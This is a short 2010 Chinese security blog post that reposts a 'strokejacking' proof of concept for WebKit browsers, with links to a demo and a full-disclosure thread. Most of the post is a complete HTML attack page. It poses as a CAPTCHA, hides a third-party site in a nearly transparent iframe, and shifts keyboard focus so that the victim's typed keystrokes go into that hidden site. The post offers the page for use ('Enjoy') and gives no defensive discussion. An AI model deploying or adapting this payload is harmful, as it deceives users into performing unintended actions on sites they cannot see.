strokejacking
Posted on | 三月 15, 2010 | No Comments
这个欺骗演示工作在WebKit内核的浏览器上。
POC:
<body onload=”document.getElementById(‘dummy’).focus()”>
<h3>Totally legitimate CAPTCHA page</h3>
<iframe src=”http://www.google.com/” id=victim name=victim style=”opacity: 0.2″ height=”20%” width=”80%”>
</iframe>
<script>
var need = [ 80, 79, 82, 78, 13 ];
var text = [ 'p', 'o', 'r', 'n', '' ];
var cur_pos = 0;
function maybe_redirect(e) {
var evt = window.event ? event : e;
var cc = evt.charCode ? evt.charCode : evt.keyCode;
if (cur_pos >= need.length || need[cur_pos] != cc) return;
if (window.netscape == undefined) {
document.getElementById(‘victim’).focus();
} else {
frames['victim'].focus();
}
document.getElementById(‘dummy’).value += text[cur_pos];
cur_pos++;
setTimeout(‘focus();document.getElementById(“dummy”).focus()’,1);
}
</script>
<p>
<span style=”border: 1px solid red; background-color: #FFFFC0; font-size: 20pt; padding: 5px”>opportunity</span>
<p>
Retype text from the image to authenticate, then hit RETURN:<br>
<input type=text onkeydown=”maybe_redirect(event)” id=dummy>
<p>
<font color=gray size=-1>PS. Can we call it “strokejacking”?</font><br>
<font color=gray size=-1>PPS. This version should work in Firefox 3.x, too. Enjoy.</font>
Demo:http://lcamtuf.coredump.cx/focus-webkit/
Info:http://seclists.org/fulldisclosure/2010/Mar/232
相关文章:
评论|Comments
留言|Leave a Reply
Archives
- 2012年五月 (1)
- 2012年四月 (1)
- 2012年三月 (3)
- 2012年一月 (1)
- 2011年十二月 (1)
- 2011年十一月 (4)
- 2011年十月 (3)
- 2011年九月 (2)
- 2011年八月 (1)
- 2011年七月 (1)
- 2011年五月 (1)
- 2011年三月 (3)
- 2011年二月 (2)
- 2011年一月 (6)
- 2010年十一月 (2)
- 2010年十月 (10)
- 2010年九月 (7)
- 2010年八月 (4)
- 2010年七月 (11)
- 2010年六月 (14)
- 2010年五月 (14)
- 2010年四月 (20)
- 2010年三月 (61)
- 2010年二月 (71)
- 2010年一月 (59)
- 2009年十二月 (78)
- 2009年十一月 (61)
链接表
SUNSHINE
About
